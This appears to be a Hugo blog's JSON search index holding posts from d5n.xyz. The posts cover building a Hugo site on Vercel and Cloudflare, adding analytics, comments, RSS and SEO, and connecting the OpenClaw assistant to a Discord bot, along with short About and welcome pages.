0.5 enableRobotsTXT = true Deployment Checklist git add hugo.toml static/robots.txt git commit -m \u0026#34;Add analytics, comments, RSS, and SEO\u0026#34; git push Then verify:\nGA4 shows real-time visitors Giscus loads on posts /index.xml returns valid RSS /sitemap.xml URLs match your domain GSC successfully fetches the sitemap What You Now Have A blog that:\n📊 Tracks visitor behavior (GA4) 💬 Engages readers (Giscus) 📡 Distributes via RSS 🔍 Ranks on search engines (SEO) All without spending a dime on infrastructure.\nResources Hugo Documentation PaperMod Wiki Giscus Google Search Console ","permalink":"https://www.d5n.xyz/en/posts/hugo-blog-optimization/","summary":"\u003ch2 id=\"why-this-matters\"\u003eWhy This Matters\u003c/h2\u003e\n\u003cp\u003eYou have a working Hugo blog. Great. But a modern blog needs more than just content—it needs to understand its audience, enable discussion, and be discoverable. This guide covers four essential upgrades that transform a basic blog into a professional platform:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eAnalytics\u003c/strong\u003e – Understand who\u0026rsquo;s reading what\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eComments\u003c/strong\u003e – Let readers engage with your content\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRSS\u003c/strong\u003e – Enable subscriptions for your regulars\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSEO\u003c/strong\u003e – Make sure search engines can find you\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eThe best part? All of these are free, open-source, and require zero backend infrastructure.\u003c/p\u003e","title":"Level Up Your Hugo Blog: Adding Analytics, Comments, RSS, and SEO"},{"content":"Introduction Today I spent about 8 hours building this blog from scratch. This post documents the complete process, including technology choices, pitfalls encountered, and their solutions. 
Hope this helps anyone looking to build their own blog.\nTech Stack Overview Hugo - Static Site Generator Hugo is a static site generator written in Go, marketed as \u0026ldquo;the world\u0026rsquo;s fastest static site generator.\u0026rdquo;\nPros:\n⚡ Lightning-fast builds (thousands of pages per second) 🎨 Rich theme ecosystem (300+ official themes) 📝 Native Markdown support 🔧 Single binary deployment Cons:\nTheme versions may be incompatible with Hugo versions Learning curve involved GitHub - Code Hosting GitHub hosts the blog source code with Git version control.\nFunctions:\nCode version management Markdown file storage Automatic deployment integration with Vercel Vercel - Static Site Hosting Vercel is a frontend deployment platform with excellent static site support.\nPros:\n🚀 Automatic deployment (deploy on every push) 🌍 Global CDN acceleration 🆓 Free tier sufficient for personal blogs 🔒 Automatic HTTPS Notes:\nDeployment Protection may be enabled by default (needs to be disabled for public access) Hugo version environment variable needs to be configured correctly Cloudflare - DNS + CDN Cloudflare provides DNS resolution and CDN acceleration.\nFunctions:\nDomain DNS management SSL/TLS certificates (automatic) DDoS protection Global CDN acceleration Step-by-Step Setup Step 1: Domain Purchase I chose d5n.xyz - Duran (5 letters) + N.\nTips:\n3-letter .com domains are mostly premium ($1000+) .xyz is cheap for the first year ($1-3), but check renewal prices Cloudflare offers domain registration at cost (no markup) Step 2: Initialize Hugo Site hugo new site duranblog cd duranblog git init git submodule add --depth=1 https://github.com/adityatelange/hugo-PaperMod.git themes/PaperMod Configure hugo.toml:\nbaseURL = \u0026#39;https://d5n.xyz\u0026#39; languageCode = \u0026#39;zh-CN\u0026#39; title = \u0026#39;D5N\u0026#39; theme = \u0026#39;PaperMod\u0026#39; Step 3: Create GitHub Repository Repository name: duranblog Type: Public (Vercel free tier has no limits for 
public repos) Initialize with README Step 4: Push Code to GitHub Issue 1: Git Authentication Failure\nError:\nfatal: could not read Username for \u0026#39;https://github.com\u0026#39; Solution: Use Personal Access Token authentication:\ngit remote set-url origin https://openduran:TOKEN@github.com/openduran/duranblog.git Step 5: Vercel Deployment Issue 2: Raw HTML Source Displayed Symptom: Browser shows raw HTML code instead of rendered webpage.\nInvestigation:\nChecked GitHub repo, found public/ directory was committed Vercel has auto-build; no need to commit built files Remove public/ and add .gitignore Solution:\nrm -rf public/ echo \u0026#34;public/\u0026#34; \u0026gt;\u0026gt; .gitignore git add . \u0026amp;\u0026amp; git commit -m \u0026#34;Remove public dir\u0026#34; \u0026amp;\u0026amp; git push Issue 3: Hugo Version Incompatibility Error:\nWARN Module \u0026#34;PaperMod\u0026#34; is not compatible with this Hugo version: Min 0.146.0 ERROR render of \u0026#34;/404\u0026#34; failed Cause: Vercel\u0026rsquo;s default Hugo version is too old; PaperMod requires 0.146.0+\nSolution: Add environment variable in Vercel project settings:\nName: HUGO_VERSION Value: 0.146.5 Issue 4: Login Required (401 Error) Symptom: Website shows \u0026ldquo;Vercel Authentication\u0026rdquo;\nSolution:\nGo to Vercel project Settings → General Find \u0026ldquo;Deployment Protection\u0026rdquo; Change to \u0026ldquo;Disabled\u0026rdquo; Save and redeploy Step 6: Configure Cloudflare DNS Issue 5: SSL Handshake Failed (525 Error) Error:\n525: SSL handshake failed Cause: Cloudflare SSL mode incompatible with Vercel\nSolution:\nGo to Cloudflare → SSL/TLS → Overview Change mode from \u0026ldquo;Flexible\u0026rdquo; to \u0026ldquo;Full\u0026rdquo; or \u0026ldquo;Full (strict)\u0026rdquo; Issue 6: Root Domain Not Accessible Symptom: www.d5n.xyz works, but d5n.xyz doesn\u0026rsquo;t\nCause: Missing DNS record for root domain\nSolution: Add in Cloudflare DNS:\nType: CNAME Name: @ (or www) 
Target: cname.vercel-dns.com Proxy: Orange ☁️ (Proxied) Deployment Workflow Local Development ↓ Hugo Build Test ↓ Git push to GitHub ↓ Vercel Auto-detect → Auto-deploy ↓ Cloudflare DNS Resolution ↓ User visits d5n.xyz Key Configuration Summary Hugo Version Control Always specify Hugo version in Vercel environment variables:\nHUGO_VERSION=0.146.5 Vercel Build Settings Build Command: hugo --gc --minify Output Directory: public Install Command: (leave blank or yarn install) Cloudflare SSL Settings Mode: Full or Full (strict) Don\u0026rsquo;t use: Flexible (causes 525 error) Final Result Domain: https://d5n.xyz Source: https://github.com/openduran/duranblog Stack: Hugo + PaperMod + Vercel + Cloudflare Cost: $12/year for domain, everything else free Lessons Learned Don\u0026rsquo;t commit public/ directory - Let Vercel build it Specify Hugo version - Avoid theme compatibility issues Disable Deployment Protection - Otherwise login is required Use Full SSL mode - Flexible causes handshake failures Complete DNS records - Both root and www subdomains need configuration Next Steps Add Google Analytics Configure comments (Giscus/Utterances) Add RSS feed Optimize SEO (sitemap, robots.txt) Configure image CDN Conclusion: Building a blog from scratch isn\u0026rsquo;t complicated—it\u0026rsquo;s mostly about troubleshooting. Once the automated deployment pipeline is set up, publishing posts is just a git push away. Hope this guide helps!\n","permalink":"https://www.d5n.xyz/en/posts/blog-setup-guide/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eToday I spent about 8 hours building this blog from scratch. This post documents the complete process, including technology choices, pitfalls encountered, and their solutions. 
Hope this helps anyone looking to build their own blog.\u003c/p\u003e\n\u003ch2 id=\"tech-stack-overview\"\u003eTech Stack Overview\u003c/h2\u003e\n\u003ch3 id=\"hugo---static-site-generator\"\u003eHugo - Static Site Generator\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://gohugo.io/\"\u003eHugo\u003c/a\u003e is a static site generator written in Go, marketed as \u0026ldquo;the world\u0026rsquo;s fastest static site generator.\u0026rdquo;\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003ePros:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e⚡ Lightning-fast builds (thousands of pages per second)\u003c/li\u003e\n\u003cli\u003e🎨 Rich theme ecosystem (300+ official themes)\u003c/li\u003e\n\u003cli\u003e📝 Native Markdown support\u003c/li\u003e\n\u003cli\u003e🔧 Single binary deployment\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCons:\u003c/strong\u003e\u003c/p\u003e","title":"Building a Hugo Blog from Scratch: Vercel + Cloudflare Complete Guide"},{"content":"What We\u0026rsquo;re Building An AI assistant that lives in your Discord server—capable of answering questions, running tasks, and integrating with your workflows.\nWhat you\u0026rsquo;ll need:\nA Discord account A server where you\u0026rsquo;re admin About 15 minutes Step 1: Create a Discord Bot 1.1 Access the Developer Portal Go to Discord Developer Portal Click \u0026ldquo;New Application\u0026rdquo; Name it (e.g., \u0026ldquo;MyAIAssistant\u0026rdquo;) Accept the terms 1.2 Enable Bot Functionality In your app, go to \u0026ldquo;Bot\u0026rdquo; section (left sidebar) Click \u0026ldquo;Add Bot\u0026rdquo; Confirm with \u0026ldquo;Yes, do it!\u0026rdquo; 1.3 Get Your Token Critical: The bot token is like a password. Never share it or commit it to git.\nUnder Bot section, click \u0026ldquo;Reset Token\u0026rdquo; Copy the new token (starts with something like MTQ2N...) 
Store it securely (password manager or env variable) Step 2: Configure Bot Permissions 2.1 Privileged Gateway Intents Enable these under Bot → Privileged Gateway Intents:\n✅ MESSAGE CONTENT INTENT (required for reading messages) ✅ SERVER MEMBERS INTENT (for member-related features) ✅ PRESENCE INTENT (optional, for presence data) Without MESSAGE CONTENT INTENT, your bot can\u0026rsquo;t see what people are saying.\n2.2 OAuth2 Scopes Go to OAuth2 → URL Generator Select scopes: bot applications.commands Select bot permissions: Send Messages Read Message History Embed Links Attach Files Add Reactions Use Slash Commands 2.3 Invite Bot to Server Copy the generated URL Open in browser Select your server Authorize Step 3: Configure OpenClaw 3.1 Set Environment Variable export DISCORD_BOT_TOKEN=\u0026#34;your-token-here\u0026#34; Or add to ~/.openclaw/.env:\nDISCORD_BOT_TOKEN=your-token-here 3.2 Update the OpenClaw Config { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;, \u0026#34;groupPolicy\u0026#34;: \u0026#34;allowlist\u0026#34; } } } 3.3 Configure Channel Permissions Restrict which channels the bot can access:\n\u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;, \u0026#34;groupPolicy\u0026#34;: \u0026#34;allowlist\u0026#34;, \u0026#34;guilds\u0026#34;: { \u0026#34;YOUR_GUILD_ID\u0026#34;: { \u0026#34;channels\u0026#34;: { \u0026#34;CHANNEL_ID_1\u0026#34;: { \u0026#34;allow\u0026#34;: true }, \u0026#34;CHANNEL_ID_2\u0026#34;: { \u0026#34;allow\u0026#34;: true } } } } } } Finding IDs:\nEnable Developer Mode in Discord (Settings → Advanced) Right-click server → \u0026ldquo;Copy Server ID\u0026rdquo; Right-click channel → \u0026ldquo;Copy Channel ID\u0026rdquo; Step 4: Test the Setup 4.1 Start OpenClaw openclaw gateway restart 4.2 Check Logs 
openclaw gateway status # Or check systemd logs journalctl --user -u openclaw-gateway -f 4.3 Test in Discord Go to an allowed channel Mention the bot: @MyAIAssistant hello Check for response Common Issues \u0026ldquo;401 Unauthorized\u0026rdquo; Cause: Invalid or expired token\nFix:\nReset token in Discord Developer Portal Update environment variable Restart gateway \u0026ldquo;403 Forbidden\u0026rdquo; Cause: Bot lacks permissions\nFix:\nCheck OAuth2 URL generated correct permissions Re-invite bot with updated scope Verify MESSAGE CONTENT INTENT is enabled \u0026ldquo;Cannot send messages\u0026rdquo; Cause: Channel permissions override bot permissions\nFix:\nCheck channel-specific permissions Ensure bot role is above restricted roles Verify bot is in the channel Bot doesn\u0026rsquo;t respond Checklist:\nGateway running? (openclaw gateway status) Token correct? (check for extra spaces) Channel in allowlist? (if using groupPolicy) Bot has message read permission? Mentioning correctly? (@BotName) Security Best Practices Never commit tokens – Use environment variables Use allowlists – Restrict to specific channels Rotate tokens periodically – Every 90 days Monitor bot activity – Check logs regularly Limit permissions – Only what\u0026rsquo;s necessary What\u0026rsquo;s Next Now that Discord is connected, you can:\nSet up scheduled tasks (cron jobs) Configure multiple channels for different purposes Add webhook integrations Set up DM responses See the OpenClaw Discord docs for advanced features.\nFull working configuration in the example above. 
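Part of the troubleshooting checklist earlier (unset token, stray whitespace from copy-paste) can be automated before restarting the gateway. A minimal sketch; the check_token helper is hypothetical, not part of the OpenClaw CLI:

```shell
# Hypothetical pre-flight check: flag a DISCORD_BOT_TOKEN that is empty or
# contains whitespace, two common causes of 401 Unauthorized after pasting.
check_token() {
  case ${DISCORD_BOT_TOKEN:-} in
    *[[:space:]]*) echo token contains whitespace; return 1 ;;
    ?*)            echo token looks well-formed ;;
    *)             echo token is empty; return 1 ;;
  esac
}

check_token
```

If it reports a problem, re-copy the token from the Developer Portal before reaching for a full reset.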
Adjust channel IDs and token for your setup.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-discord-complete-guide/","summary":"\u003ch2 id=\"what-were-building\"\u003eWhat We\u0026rsquo;re Building\u003c/h2\u003e\n\u003cp\u003eAn AI assistant that lives in your Discord server—capable of answering questions, running tasks, and integrating with your workflows.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat you\u0026rsquo;ll need:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA Discord account\u003c/li\u003e\n\u003cli\u003eA server where you\u0026rsquo;re admin\u003c/li\u003e\n\u003cli\u003eAbout 15 minutes\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"step-1-create-a-discord-bot\"\u003eStep 1: Create a Discord Bot\u003c/h2\u003e\n\u003ch3 id=\"11-access-the-developer-portal\"\u003e1.1 Access the Developer Portal\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eGo to \u003ca href=\"https://discord.com/developers/applications\"\u003eDiscord Developer Portal\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClick \u0026ldquo;New Application\u0026rdquo;\u003c/li\u003e\n\u003cli\u003eName it (e.g., \u0026ldquo;MyAIAssistant\u0026rdquo;)\u003c/li\u003e\n\u003cli\u003eAccept the terms\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch3 id=\"12-enable-bot-functionality\"\u003e1.2 Enable Bot Functionality\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eIn your app, go to \u0026ldquo;Bot\u0026rdquo; section (left sidebar)\u003c/li\u003e\n\u003cli\u003eClick \u0026ldquo;Add Bot\u0026rdquo;\u003c/li\u003e\n\u003cli\u003eConfirm with \u0026ldquo;Yes, do it!\u0026rdquo;\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch3 id=\"13-get-your-token\"\u003e1.3 Get Your Token\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eCritical:\u003c/strong\u003e The bot token is like a password. 
Never share it or commit it to git.\u003c/p\u003e","title":"Setting Up OpenClaw with Discord: Complete Guide"},{"content":"About D5N D5N is a tech blog focused on AI, Intelligent Agents, and Automation Tools.\nWhat You\u0026rsquo;ll Find Here 🤖 AI \u0026amp; Agents: Practical guides on OpenClaw, LLM applications, and agent frameworks ⚙️ Automation: Workflow optimization, scripting, and productivity tools 🛠️ DevOps: Server configuration, deployment, and infrastructure tips 💡 Tutorials: Step-by-step guides with working examples About the Author I\u0026rsquo;m Duran, a tech enthusiast exploring the intersection of AI and automation. This blog documents my learning journey and practical experiments.\nContact GitHub: openduran Blog: https://www.d5n.xyz Building the future, one automation at a time.\n","permalink":"https://www.d5n.xyz/en/about/","summary":"\u003ch2 id=\"about-d5n\"\u003eAbout D5N\u003c/h2\u003e\n\u003cp\u003eD5N is a tech blog focused on \u003cstrong\u003eAI, Intelligent Agents, and Automation Tools\u003c/strong\u003e.\u003c/p\u003e\n\u003ch3 id=\"what-youll-find-here\"\u003eWhat You\u0026rsquo;ll Find Here\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🤖 \u003cstrong\u003eAI \u0026amp; Agents\u003c/strong\u003e: Practical guides on OpenClaw, LLM applications, and agent frameworks\u003c/li\u003e\n\u003cli\u003e⚙️ \u003cstrong\u003eAutomation\u003c/strong\u003e: Workflow optimization, scripting, and productivity tools\u003c/li\u003e\n\u003cli\u003e🛠️ \u003cstrong\u003eDevOps\u003c/strong\u003e: Server configuration, deployment, and infrastructure tips\u003c/li\u003e\n\u003cli\u003e💡 \u003cstrong\u003eTutorials\u003c/strong\u003e: Step-by-step guides with working examples\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"about-the-author\"\u003eAbout the Author\u003c/h3\u003e\n\u003cp\u003eI\u0026rsquo;m Duran, a tech enthusiast exploring the intersection of AI and automation. 
This blog documents my learning journey and practical experiments.\u003c/p\u003e","title":"About"},{"content":"Welcome to D5N This is the English version of my tech blog. Here I share:\n🤖 AI and Agent technologies ⚙️ Automation workflows 🛠️ DevOps practices 💡 Technical tutorials About This Blog Built with:\nHugo - Static site generator PaperMod - Clean theme Vercel - Hosting Cloudflare - DNS \u0026amp; CDN Bilingual Support This blog now supports both Chinese and English. Use the language switcher in the header to switch between languages.\nNot all articles are translated yet—I\u0026rsquo;m working on it gradually.\nStay curious, keep building.\n","permalink":"https://www.d5n.xyz/en/posts/hello-world/","summary":"\u003ch2 id=\"welcome-to-d5n\"\u003eWelcome to D5N\u003c/h2\u003e\n\u003cp\u003eThis is the English version of my tech blog. Here I share:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e🤖 AI and Agent technologies\u003c/li\u003e\n\u003cli\u003e⚙️ Automation workflows\u003c/li\u003e\n\u003cli\u003e🛠️ DevOps practices\u003c/li\u003e\n\u003cli\u003e💡 Technical tutorials\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"about-this-blog\"\u003eAbout This Blog\u003c/h2\u003e\n\u003cp\u003eBuilt with:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHugo\u003c/strong\u003e - Static site generator\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePaperMod\u003c/strong\u003e - Clean theme\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVercel\u003c/strong\u003e - Hosting\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCloudflare\u003c/strong\u003e - DNS \u0026amp; CDN\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"bilingual-support\"\u003eBilingual Support\u003c/h2\u003e\n\u003cp\u003eThis blog now supports both Chinese and English. Use the language switcher in the header to switch between languages.\u003c/p\u003e","title":"Hello World"}]